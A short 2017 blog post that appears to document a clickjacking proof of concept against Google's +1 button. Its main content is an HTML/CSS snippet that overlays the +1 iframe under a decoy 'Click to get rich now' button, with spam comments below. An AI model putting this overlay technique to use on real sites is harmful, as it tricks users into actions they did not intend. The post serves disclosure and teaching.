Sunday, 16 July 2017

Google G+1 ClickJacking BUG





The previous basic introduction tutorial - https://www.youtube.com/watch?v=cbgNHnMsaPg&t=192s



The snippet -

<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:0px;
  opacity: 1; /* in real opacity:0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="https://plusone.google.com/_/+1/fastbutton?bsv&size=medium&hl=en-US&url=https://engineering.linkedin.com/security/our-private-bug-bounty-program-reducing-vulnerabilities-leveraging-expert-crowds"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div> 

............................................................


Other Posts -





PAYTMPromoCode BUG POC

YoutubeUnauthorized Adword Linking BUG POC 

 WhatsApp Translate Account Takeover BUG POC (slow rate limit)

Cross Site Scripting (XSS) - 6 (Reflected XSS at its best)

Create Unlimited Instagram Accounts (unvalidated verification)


Posted by at
Labels:

4 comments:

  1. Unknown28 February 2018 at 23:25

    Oh great,
    Looking nice information learned a lot from your blog.
    Need updates like this plz do keep sharing on...
    Digital Marketing Online Training | SEO Online Training | Google Analytics Online Training | Doubleclick for Publishers Training

    ReplyDelete
  2. bhanupratap24 July 2018 at 01:53

    Great,Good Article Keep on updating the content

    ReplyDelete
  3. Unknown8 August 2018 at 21:30

    Love to read it,Waiting For More new Update and Keep Sharing This Type Of Blog Thank You..,

    Best Software Training Institute in Chennai

    Best Online Training Institute in Chennai

    ReplyDelete
  4. Sanvi14 February 2019 at 00:21

    It is very useful for me to learn and understand easily. Thanks for sharing your valuable information and time.

    CEH Training In Hyderbad

    ReplyDelete

Subscribe to: Post Comments (Atom)